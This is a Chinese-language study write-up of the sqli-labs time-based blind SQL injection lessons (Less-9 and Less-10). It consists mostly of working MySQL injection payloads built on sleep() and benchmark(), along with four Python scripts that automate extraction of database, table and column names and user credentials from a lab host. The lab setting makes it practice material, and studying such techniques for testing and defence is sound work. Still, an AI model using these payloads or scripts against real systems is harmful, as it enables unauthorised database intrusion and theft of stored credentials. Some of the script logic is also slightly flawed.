之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象
延时型 SQL 盲注 #
函数讲解
利用 sleep() 函数进行注入
?id=1’ and if(ascii(substr(database(),1,1))=115,sleep(5),1)#
?id=1’ union select (if(substring(database(),1,1)=char(115),sleep(5),1)),2,3#
?id=1’ and if(ascii(substr((要执行的语句),1,1))=115,sleep(5),1)#
?id=1’ union select (if(substring((要执行的语句),1,1)=char(115),sleep(5),1)),2,3#
当错误的时候会有5 秒的时间延时。
利用 benchmark()进行延时注入
?id=1’ and (select 1 from (select concat((ascii(substr((要执行的语句),1,1))=115),benchmark(50000000,encode(‘msg’,’key’)))x from information_schema.tables group by x)a)#
?id=1’ and if(ascii(substr((要执行的语句),1,1))=115,benchmark(50000000,encode(‘msg’,’key’)),1)#
?id=1’ union select (if(substring((要执行的语句),1,1)=char(115),benchmark(50000000,encode(‘msg’,’key’)),1)),2,3#
?id=1’ and (select 1 from (select concat((ascii(substr((database()),1,1))=115),benchmark(50000000,encode(‘msg’,’key’)))x from information_schema.tables group by x)a)#
?id=1’ and (select 1 from (select concat((select username from security.users limit 0,1),benchmark(50000000,encode(‘msg’,’key’)))x from information_schema.tables group by x)a)#
?id=1’ and if(ascii(substr(benchmark(50000000,encode(‘msg’,’key’)),1,1))=115,sleep(5),1)#
?id=1’ union select (if(substring((select database() limit 0,1),1,1)=char(115),benchmark(50000000,encode(‘msg’,’key’)),1)),2,3#
当结果正确的时候,运行encode(‘msg’,’key’)操作50000000 次,会占用一段时间。
benchmark()函数,可以测试某些特定操作的执行速度。该函数只是简单地返回服务器执行表达式的时间,而不会涉及分析和优化的开销。
MySQL 字符串截取函数:left(), right(), substring(), substring_index(), mid(), substr()。其中 mid(), substr() 等价于 substring() 函数
encode() 对字符进行加密运算 mysql加密解密方式用法 encode()、decode()
Less-9 延时型sql盲注-单引号
猜数据库
?id=1’ and if(ascii(substr(database(),1,1))=115,sleep(5),1)–+
?id=1’ and if(ascii(substr(database(),2,1))=101,sleep(5),1)–+
?id=1’ and if(ascii(substr(database(),3,1))=99,sleep(5),1)–+
结果为 security
执行脚本
# -*- coding: utf-8 -*- # filename:Less09-1 database_name.py import hackhttp import re import time def database_name(arg): print "database_name start test..." payloads = list('abcdefghijklmnopqrstuvwxyz') name="" for k in range(15): for i in range(64,122): startTime=time.time() hh = hackhttp.hackhttp() msg = "1%27%20and%20if(ascii(substr(database(),{k},1))={i},sleep(5),1)--+".format(k=k,i=i) code, head, body, redirect_url, log = hh.http(arg+msg) count = re.findall("You are in",body) if time.time() - startTime > 5: name+=chr(i) print "第%s位为%s" % (k,i) break name+=" " print "数据库名为: {name}".format(name=name) if __name__ == '__main__': database_name('http://10.10.10.137/sqli-labs/Less-9/?id=')
猜表名
?id=1’ and if(ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 1,1),1,1))=114,sleep(5),1)–+
?id=1’ and if(ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 1,1),2,1))=101,sleep(5),1)–+
?id=1’ and if(ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 1,1),3,1))=102,sleep(5),1)–+
结果为 emails referers uagents users
执行脚本
# -*- coding: utf-8 -*- # filename:Less09-2 table_name.py import hackhttp import re import time def table_name(arg): print "table_name start test..." payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.') table_name="" database_name="" for k in range(5): for i in range(1,10): for j in range(65,122): startTime=time.time() hh = hackhttp.hackhttp() msg = "1%27%20and%20if(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%20{k},1),{i},1))={j},sleep(5),1)--+".format(k=k,i=i,j=j) code, head, body, redirect_url, log = hh.http(arg+msg) count = re.findall("You are in",body) if time.time() - startTime > 5: table_name+=chr(j) print "第%s个表的第%s位的ASCII码值是%s" % (k+1,i,j) break table_name+=" " print "security 数据库的表名为: {table_name}".format(table_name=table_name) if __name__ == '__main__': table_name('http://10.10.10.137/sqli-labs/Less-9/?id=')
猜列名
?id=1’ and if(ascii(substr((select column_name from information_schema.columns where table_name=’users’ limit 0,1),1,1))=117,sleep(5),1)–+
?id=1’ and if(ascii(substr((select column_name from information_schema.columns where table_name=’users’ limit 0,1),2,1))=115,sleep(5),1)–+
?id=1’ and if(ascii(substr((select column_name from information_schema.columns where table_name=’users’ limit 0,1),3,1))=101,sleep(5),1)–+
结果为 user_id first_nam last_name user password
执行脚本
# -*- coding: utf-8 -*- # filename:Less09-3 column_name.py import hackhttp import re import time def column_name(arg): print "column_name start test..." payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.') column_name="" database_name="" for k in range(5): for i in range(1,10): for j in range(65,122): startTime=time.time() hh = hackhttp.hackhttp() msg = "1%27%20and%20if(ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27%20limit%20{k},1),{i},1))={j},sleep(5),1)--+".format(k=k,i=i,j=j) code, head, body, redirect_url, log = hh.http(arg+msg) count = re.findall("You are in",body) if time.time() - startTime > 5: column_name+=chr(j) print "第%s个列的第%s位的ASCII码值是%s" % (k+1,i,j) break column_name+=" " print "security 数据库的 user 表的列名为: {column_name}".format(column_name=column_name) if __name__ == '__main__': column_name('http://10.10.10.137/sqli-labs/Less-9/?id=')
猜数据
?id=1’ and if(ascii(substr((select username from security.users limit 0,1),1,1))=68,sleep(5),1)–+
?id=1’ and if(ascii(substr((select username from security.users limit 0,1),2,1))=117,sleep(5),1)–+
?id=1’ and if(ascii(substr((select username from security.users limit 0,1),3,1))=109,sleep(5),1)–+
结果为
username: Dumb Angelina Dummy secure stupid superman batman admin admin admin password: Dumb Ikillyo pssword crappy stupidity genious moble admin admin admin
运行脚本
# -*- coding: utf-8 -*- # filename:Less09-4 data.py import hackhttp import re import time def data(arg): print "data start test..." payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.-+*/') payload2 = ['username','password'] data="username: " for k in payload2: # 两个列名 for x in range(10): # 每个列假设十个数据 for i in range(1,10): # 每个数据的第i位的值匹配j for j in range(65,122): # startTime=time.time() hh = hackhttp.hackhttp() msg = "1%27%20and%20if(ascii(substr((select%20{k}%20from%20security.users%20limit%200,1),{i},1))={j},sleep(5),1)--+".format(k=k,x=x,i=i,j=j) code, head, body, redirect_url, log = hh.http(arg+msg) count = re.findall("You are in",body) if time.time() - startTime > 5: data+=chr(j) print "%s列的第%s个数据的第%s位的ASCII码值是%s" % (k,x+1,i,j) break data += "\t" print "{data}".format(data=data) data += "\npassword: " if __name__ == '__main__': data('http://10.10.10.137/sqli-labs/Less-9/?id=')
Less-10 延时型sql盲注-双引号
函数讲解
?id=1” union select (if(substring(database(),1,1)=char(115),benchmark(50000000,encode(‘msg’,’key’)),null)),2,3–+
当结果正确的时候,运行encode(‘msg’,’key’)操作50000000 次,会占用一段时间。
benchmark()函数,可以测试某些特定操作的执行速度。该函数只是简单地返回服务器执行表达式的时间,而不会涉及分析和优化的开销。
MySQL 字符串截取函数:left(), right(), substring(), substring_index(), mid(), substr()。其中 mid(), substr() 等价于 substring() 函数
encode() 对字符进行加密运算 mysql加密解密方式用法 encode()、decode()
猜数据库名
?id=1” and if(ascii(substr(database(),1,1))=115,benchmark(50000000,encode(‘msg’,’key’)),1)–+
?id=1” union select (if(substring(database(),1,1)=char(115),benchmark(50000000,encode(‘msg’,’key’)),null)),2,3–+
?id=1” union select (if(substring(database(),2,1)=char(101),benchmark(50000000,encode(‘msg’,’key’)),null)),2,3–+
?id=1” union select (if(substring(database(),3,1)=char(99),benchmark(50000000,encode(‘msg’,’key’)),null)),2,3–+
结果为:security
猜表名
?id=1” union select (if(substring((select table_name from information_schema.tables where table_schema=’security’ limit 1,1),1,1)=char(114),benchmark(50000000,encode(‘msg’,’key’)),null)),2,3–+
?id=1” union select (if(substring((select table_name from information_schema.tables where table_schema=’security’ limit 1,1),2,1)=char(101),benchmark(50000000,encode(‘msg’,’key’)),null)),2,3–+
?id=1” union select (if(substring((select table_name from information_schema.tables where table_schema=’security’ limit 1,1),3,1)=char(102),benchmark(50000000,encode(‘msg’,’key’)),null)),2,3–+
结果为:emails referers uagents users
猜列名
?id=1” union select (if(substring((select column_name from information_schema.columns where table_name=’users’ limit 0,1),1,1)=char(117),benchmark(50000000,encode(‘msg’,’key’)),null)),2,3–+
?id=1” union select (if(substring((select column_name from information_schema.columns where table_name=’users’ limit 0,1),2,1)=char(115),benchmark(50000000,encode(‘msg’,’key’)),null)),2,3–+
?id=1” union select (if(substring((select column_name from information_schema.columns where table_name=’users’ limit 0,1),3,1)=char(101),benchmark(50000000,encode(‘msg’,’key’)),null)),2,3–+
结果为:user_id first_nam last_name user password
猜数据
?id=1” union select(if(substr((select password from security.users limit 0,1),1,1)=char(68),benchmark(50000000,encode(‘msg’,’key’)),null)),2,3–+
?id=1” and if(ascii(substr((select username from security.users limit 0,1),1,1))=68,benchmark(50000000,encode(‘msg’,’key’)),null)–+
?id=1” union select(if(substr((select password from security.users limit 0,1),2,1)=char(117),benchmark(50000000,encode(‘msg’,’key’)),null)),2,3–+
?id=1” and if(ascii(substr((select username from security.users limit 0,1),2,1))=117,benchmark(50000000,encode(‘msg’,’key’)),null)–+
?id=1” union select(if(substr((select password from security.users limit 0,1),3,1)=char(109),benchmark(50000000,encode(‘msg’,’key’)),null)),2,3–+
?id=1” and if(ascii(substr((select username from security.users limit 0,1),3,1))=109,benchmark(50000000,encode(‘msg’,’key’)),null)–+
结果为:
username: Dumb Angelina Dummy secure stupid superman batman admin admin admin password: Dumb Ikillyo pssword crappy stupidity genious moble admin admin admin